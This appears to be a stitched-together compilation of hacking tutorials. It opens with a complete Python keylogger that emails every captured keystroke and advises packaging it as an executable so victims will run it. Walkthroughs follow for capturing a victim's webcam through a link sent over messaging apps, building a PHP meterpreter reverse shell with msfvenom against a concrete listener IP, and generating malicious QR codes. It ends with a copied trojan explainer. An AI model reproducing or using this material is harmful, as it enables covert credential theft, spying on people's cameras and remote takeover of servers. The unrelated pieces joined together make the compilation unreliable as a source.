making python based automated keylogger

How to Make a Keylogger in Python

Creating and implementing a keylogger from scratch that records key strokes from keyboard and send them to email or save them as log files using Python and keyboard library.

 

A keylogger is a type of surveillance technology used to monitor and record each keystroke typed on a specific computer's keyboard. In this tutorial, you will learn how to write a keylogger in Python.

You are maybe wondering, why a keylogger is useful ? Well, when a hacker (or a script kiddie) uses this for unethical purposes, he/she will register everything you type in the keyboard including your credentials (credit card numbers, passwords, etc.).

The goal of this tutorial is to make you aware of these kind of scripts as well as learning how to implement such malicious scripts on your own for educational purposes, let's get started!

Download source code

Download source code above

First onna need to install a module called keyboard, go to the terminal or the command prompt and write:

pip3 install keyboard

This module allows you to take full control of your keyboard, hook global events, register hotkeys, simulate key presses and much more, and it is small module though.

So, the Python script will do the following:

• Listen to keystrokes in the background.
• Whenever a key is pressed and released, we add it to a global string variable.
• Every N minutes, report the content of this string variable either to a local file (to upload to FTP server or Google Drive API) or via email.

Let us start by import the necessary modules:

import keyboard # for keylogs
import smtplib # for sending email using SMTP protocol (gmail)
# Timer is to make a method runs after an `interval` amount of time
from threading import Timer
from datetime import datetime

If you choose to report key logs via email, then you should set up a Gmail account and make sure that:

• Less secure app access is on (we need to enable it because we will log in using smtplib in Python).
• 2-Step Verification is off.

Like it is shown in these two figures:

Now let's initialize our parameters:

SEND_REPORT_EVERY = 60 # in seconds, 60 means 1 minute and so on
EMAIL_ADDRESS = "thisisafakegmail@gmail.com"
EMAIL_PASSWORD = "thisisafakepassword"

Note: Obviously, you need to put your correct gmail credentials, otherwise reporting via email won't work.

Setting SEND_REPORT_EVERY to 60 means we report our keylogs every 60 seconds (i.e one minute), feel free to edit this on your needs.

The best way to represent a keylogger is to create a class for it, and each method in this class does a specific task:

class Keylogger:
    def __init__(self, interval, report_method="email"):
        # we gonna pass SEND_REPORT_EVERY to interval
        self.interval = interval
        self.report_method = report_method
        # this is the string variable that contains the log of all 
        # the keystrokes within `self.interval`
        self.log = ""
        # record start & end datetimes
        self.start_dt = datetime.now()
        self.end_dt = datetime.now()

We set report_method to "email" by default, which indicates that we'll send keylogs to our email, you'll see how we pass "file" later and it will save it to a local file.

Now, we gonna need to use keyboard's on_release() function that takes a callback that for every KEY_UP event (whenever you release a key in the keyboard), it will get called, this callback takes one parameter which is a KeyboardEvent that have the name attribute , let's implement it:

    def callback(self, event):
        """
        This callback is invoked whenever a keyboard event is occured
        (i.e when a key is released in this example)
        """
        name = event.name
        if len(name) > 1:
            # not a character, special key (e.g ctrl, alt, etc.)
            # uppercase with []
            if name == "space":
                # " " instead of "space"
                name = " "
            elif name == "enter":
                # add a new line whenever an ENTER is pressed
                name = "[ENTER]\n"
            elif name == "decimal":
                name = "."
            else:
                # replace spaces with underscores
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"
        # finally, add the key name to our global `self.log` variable
        self.log += name

So whenever a key is released, the button pressed is appended to self.log string variable.

If we choose to report our keylogs to a local file, the following methods are responsible for that:

    def update_filename(self):
        # construct the filename to be identified by start & end datetimes
        start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
        end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
        self.filename = f"keylog-{start_dt_str}_{end_dt_str}"

    def report_to_file(self):
        """This method creates a log file in the current directory that contains
        the current keylogs in the `self.log` variable"""
        # open the file in write mode (create it)
        with open(f"{self.filename}.txt", "w") as f:
            # write the keylogs to the file
            print(self.log, file=f)
        print(f"[+] Saved {self.filename}.txt")

The update_filename() method is simple; we take the recorded datetimes and convert them to a readable string. After that, we construct a filename based on these dates, in which we'll use it for naming our logging files.

Then we gonna need to implement the method that given a message (in this case, key logs), it sends it as an email (head to this tutorial for more information on how this is done):

    def sendmail(self, email, password, message):
        # manages a connection to the SMTP server
        server = smtplib.SMTP(host="smtp.gmail.com", port=587)
        # connect to the SMTP server as TLS mode ( for security )
        server.starttls()
        # login to the email account
        server.login(email, password)
        # send the actual message
        server.sendmail(email, email, message)
        # terminates the session
        server.quit()

The method that reports the keylogs after every period of time:

    def report(self):
        """
        This function gets called every `self.interval`
        It basically sends keylogs and resets `self.log` variable
        """
        if self.log:
            # if there is something in log, report it
            self.end_dt = datetime.now()
            # update `self.filename`
            self.update_filename()
            if self.report_method == "email":
                self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
            elif self.report_method == "file":
                self.report_to_file()
            # if you want to print in the console, uncomment below line
            # print(f"[{self.filename}] - {self.log}")
            self.start_dt = datetime.now()
        self.log = ""
        timer = Timer(interval=self.interval, function=self.report)
        # set the thread as daemon (dies when main thread die)
        timer.daemon = True
        # start the timer
        timer.start()

So we are checking if the self.log variable got something (the user pressed something in that period), if it is the case, then report it by either saving to a local file, or sending as an email.

And then we passed the interval (in this tutorial, I've set it to 1 minute or 60 seconds, feel free to adjust it on your needs) and the function self.report() to Timer() class, and then call the start() method after we set it as a daemon thread.

This way, the method we just implemented sends keystrokes to email or saves it to a local file (based on the report_method) and calls itself recursively each self.interval seconds in separate threads.

Let's define the method that calls the on_release() method:

    def start(self):
        # record the start datetime
        self.start_dt = datetime.now()
        # start the keylogger
        keyboard.on_release(callback=self.callback)
        # start reporting the keylogs
        self.report()
        # block the current thread, wait until CTRL+C is pressed
        keyboard.wait()

For more information about how to use keyboard module, check this tutorial.

This start() method is what we'll use outside the class, as it's the essential method, we use keyboard.on_release() method to pass our previously defined callback() method.

After that, we call our self.report() method that runs on separate thread and finally we use wait() method from keyboard module to block the current thread, so we can exit out of the program by CTRL+C.

We are basically done with the Keylogger class, all we need to do now is to instantiate this class we have just created:

if __name__ == "__main__":
    # if you want a keylogger to send to your email
    # keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="email")
    # if you want a keylogger to record keylogs to a local file 
    # (and then send it using your favorite method)
    keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="file")
    keylogger.start()

If you want reports via email, then you should uncomment the first instantiation where we have report_method="email". Otherwise, if you want to report keylogs via files into the current directory, then you should use the second one, report_method set to "file".

When you execute the script using email reporting, it will record your keystrokes, after each minute, it will send all logs to the email, give it a try!

Here is what I got in my email after a minute:

This was actually what I've pressed in my personal keyboard in that period !

When you run it with report_method="file" (default), then you should start seeing log files in the current directory after each minute:

And you'll see output something like this in the console:

[+] Saved keylog-2020-12-18-150850_2020-12-18-150950.txt
[+] Saved keylog-2020-12-18-150950_2020-12-18-151050.txt
[+] Saved keylog-2020-12-18-151050_2020-12-18-151150.txt
[+] Saved keylog-2020-12-18-151150_2020-12-18-151250.txt
...

Conclusion

Now you can extend this to send the log files across the network, or you can use Google Drive API to upload them to your drive, or you can even upload them to your FTP server.

Also, since no one will to execute a .py file, you can build this code into an executable using open source libraries such as Pyinstaller.

DISCLAIMER: Note that I'm not responsible for using this code on a computer you don't have permission to, use it at your own risk!

 

Hack Victim’s WebCam With a Link

Take Webcam Shots From Target Just Sending a Malicious Link

SayCheese is Tool Coded By The Linux Choice The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia.

How it works?
The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia.

The MediaDevices.getUserMedia() method prompts the user for permission to use a media input which produces a MediaStream with tracks containing the requested types of media. That stream can include, for example, a video track (produced by either a hardware or virtual video source such as a camera, video recording device, screen sharing service, and so forth), an audio track (similarly, produced by a physical or virtual audio source like a microphone, A/D converter, or the like), and possibly other track types.


Steps to Download and Install SayCheese

This script is available for both Linux and Windows. You can check the official repository of PhoneSploit here

Step 1 Execute the following command to clone the SayCheese repository into your Linux Or Download SayCheese

git clone https://github.com/thelinuxchoice/saycheese

Step 2 Go to SayCheese repository using cd command

cd saycheese

Step 3 Now We have to grant the permission to the saycheese.sh file by typing this following command

chmod +x saycheese.sh 

after executing all command successfully we can use our tool.
Steps to  use SayCheese

Setp 1 Now we just have to type the final command put this cmd into your command for executing SayChees

bash saycheese.sh 

Now you can see our tool is ready to use

As you can see you have two option Serveo.net or ngrok both services are used for port forwarding  you can use ngrok or serveo according to you hear I'm going to using ngrok

Step 2 For use ngrok service press 2 
now wait till downloding ngrok or wait for starting ngrok or php service



after Everything is done Successfully you get a link as you can see

Step 3 You can send this link over Whatsapp or Facebook or Gmail This will Work Fine.. if Your Victim Open’s it and give the permission to the camera

hear i'm opening this link into my phone and allow to camera that's it

When target opens our link you can see victim IP address as well as you can see SayCheese Start capturing shots and receiving file .



The Image File Will be Automatically Saved here in this folder ( SayCheese Folder )



That's Done you can see Camera received Files

 

Create PHP Backdoor Of Metasploit

we going to teach you how to manually create a PHP backdoor for Metasploit and then how to exploit it 

How it works?
php-reverse-shell. This tool is designed for those situations during a pentest where you have upload access to a webserver that's running PHP. ... It differs from web form-based shell which allows you to send a single command, then returns you the output.



Creating reverse shells using php scripts is generally quite easy and can be accomplished with just a small php and a program like netcat. Netcat would run as a listener (a socket server actually) and the php script has to be run on the victim server so that it connects back.
In this example we are going to create reverse shells in php using metasploit. Yes, its too big a tool for such a small task but looks cool anyway.
To brief up the basics about reverse shells remember that it has 2 components. First is the listener on local/hacker system that waits for incoming connections, and the second is the payload script/program that runs on target computer and is configured to connect to the listener and offer a shell.

 listener (hacker machine) ++--- reverse shell payload (victim machine)

Once the listener is connected, it can gets a shell which can be used to run any command (limited to the user privilege) on the target system.

Lets Start 

Task 1 Creating PHP Payload 

So the first step is to create our payload program. This is done using the msfpayload command and looks like this

msfvenom -p php/meterpreter/reverse_tcp LHOST=3.21.94.26 LPORT=1337 R > exploit.php

The above command would create a file called exploit.php which is the reverse shell payload. It is just a plain php script that is configured according to the LHOST and LPORT parameters.

or
You can create or configure file Manually using this script → Download script

 Note:- Here I'm using static public IP in your environment you have to port forward if don't have static IP
Now upload the exploit.php to the target system.

Task 2 Starting listener

Once the payload is uploaded, the next thing to do is to start our listener which will catch the incoming connection offer.

Step 1:- Start msfconsole and run the following commands

msfconsole

Step 2:-  Use multi/handler using following command

use exploit/multi/handler

Step 3:- set payload Type following command

set payload php/meterpreter/reverse_tcp 

Step 4:- set localhost (here is your machine address)

set lhost 3.21.94.26 

Step 5:- set local port number

set lport 1337

Step 6:- start listener using following command

exploit

Now the listener is ready. Now its time to run the php script on the server. Its uploaded, and now can be run by opening from the browser like a normal url.
http://targetmachine/some/path/exploit.php

http://targetmachine/some/path/exploit.php

As soon as the script starts running, msfconsole will indicate connection and meterpreter session would come upNow that meterpreter is up, its time to play with the system.

__________________________

Happy Hacking! (Please do not spam it, It's Just For Knowledge ...)

 

Malicious QR Code with QRGen

QRGen comes with a built-in library that contains lots of popular exploits, which is extremely useful if you have time to sit down with the same device you're looking to exploit and find out which one works. For a penetration tester looking to audit anything that uses a QR code scanner, merely buying the same scanner and running through the exploits can lead you to get the scanner to behave in unexpected ways. The categories of payloads available on QRGen can be accessed by using the -l flag and a number while running the script. The number and payload type are listed below.

• Command Injection

• Format String

• String Fuzzing

• SQL Injection

• Directory Traversal

• LFI

• XSS

• watch video

• 
  
  

• Install QRGen

  To start with QRGen, we'll need to download the repository from GitHub do perform the command below in a terminal window.

  git clone https://github.com/h0nus/QRGen
  cd QRGen
  pip3 install -r requirements.txt

  Generate Malicious QR Codes from a Payload Type

  After installing the packing, you can run the script by typing python3 qrgen.py as following −

  

  To start, let's create a payload containing format string payloads. To do so, run QRGen with the following argument.

  

  Finally, a series of QR codes will be generated, and the last one that was created will open automatically.

  

trojan horse

 

RAT stands for Remote Access Trojan or Remote Administration Tool. It is one of the most dangerous virus out their over the internet. Hacker can use RAT to get complete control to your computer. He can do basicly anything with your computer. Using RAT hacker can install keyloggers and other malicious viruses remotely to your computer, infect files on your system and more. In this post i will tell you about what hacker can do with your computer using RAT and tell you about some commonly use RAT by hackers.

 What is RAT ?

As i have told you in my introduction paragraph RAT is Remote Access trojan. It is a peace of software or program which hacker uses to get complete control of your computer. It can be send to you in form of images, videos or any other files. Their are some RAT that even your antivirus software can not detect.  So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you  over the mail or in chat room.

 What You can do with RAT ?

Once a RAT is installed on any computer hacker can do almost anything with that computer. Some malicious task that you can do with RAT are listed below:

• Infecting Files
• Installing Keyloggers
• Controlling Computer
• Remotely start webcam, sounds, movies etc
• Using your PC to attack Website (DDOS)
• View Screen

 Harmless RAT or Good RAT

As you have seen how harmfull RAT are for your computer, but their are some good RAT which some of you might be using daily. You might have heard of TeamViewer, it is a software which you use to control some one’s computer with his permission for file transfer, sharing your screen and more.

 Some Commonly Used RAT

• ProRAT
• CyberGate RAT
• DarkComet RAT

• Exploit 
  Exploits are programs that contain data or code that takes advantage of a vulnerability within application software that’s running on your computer.

• Rootkit 
  Rootkits are designed to conceal certain objects or activities in your system. Often their main purpose is to prevent malicious programs being detected – in order to extend the period in which programs can run on an infected computer.

• Trojan-Banker 
  Trojan-Banker programs are designed to steal your account data for online banking systems, e-payment systems and credit or debit cards.

• Trojan-DDoS 
  These programs conduct DoS (Denial of Service) attacks against a targeted web address. By sending multiple requests – from your computer and several other infected computers – the attack can overwhelm the target address… leading to a denial of service.

• Trojan-Downloader 
  Trojan-Downloaders can download and install new versions of malicious programs onto your computer – including Trojans and adware.

• Trojan-Dropper 
  These programs are used by hackers in order to install Trojans and / or viruses – or to prevent the detection of malicious programs. Not all antivirus programs are capable of scanning all of the components inside this type of Trojan.

• Trojan-FakeAV 
  Trojan-FakeAV programs simulate the activity of antivirus software. They are designed to extort money from you – in return for the detection and removal of threats… even though the threats that they report are actually non-existent.

• Trojan-GameThief 
  This type of program steals user account information from online gamers.

• Trojan-IM 
  Trojan-IM programs steal your logins and passwords for instant messaging programs – such as ICQ, MSN Messenger, AOL Instant Messenger, Yahoo Pager, Skype and many more.

• Trojan-Ransom 
  This type of Trojan can modify data on your computer – so that your computer doesn’t run correctly or you can no longer use specific data. The criminal will only restore your computer’s performance or unblock your data, after you have paid them the ransom money that they demand.

• Trojan-SMS 
  These programs can cost you money – by sending text messages from your mobile device to premium rate phone numbers.

• Trojan-Spy 
  Trojan-Spy programs can spy on how you’re using your computer – for example, by tracking the data you enter via your keyboard, taking screen shots or getting a list of running applications.

• Trojan-Mailfinder 
  These programs can harvest email addresses from your computer.

• Other types of Trojans include:

  • Trojan-ArcBomb

  • Trojan-Clicker

  • Trojan-Notifier

  • Trojan-Proxy

  • Trojan-PSW 

How to protect yourself against Trojans

By installing effective anti-malware software, you can defend your devices – including PCs, laptops, Macs, tablets and smartphones – against Trojans. A rigorous anti-malware solution – such as Kaspersky Anti-Virus – will detect and prevent Trojan attacks on your PC, while Kaspersky Mobile Security can deliver world-class virus protection for Android smartphones. Kaspersky Lab has anti-malware products that defend the following devices against Trojans:

• Windows PCs
• Linux computers
• Apple Macs
• Smartphones
• Tablets

Other articles related to Trojans and products to remove Trojan virus

Related articles:

• What is a Computer Virus or a Computer Worm?
• Adware, Pornware and Riskware
• Who Creates Malware?

Related products to remove Trojan virus:

• Kaspersky Internet Security
• Kaspersky Anti-Virus
• Kaspersky Internet Security for Mac
• Kaspersky Internet Security for Android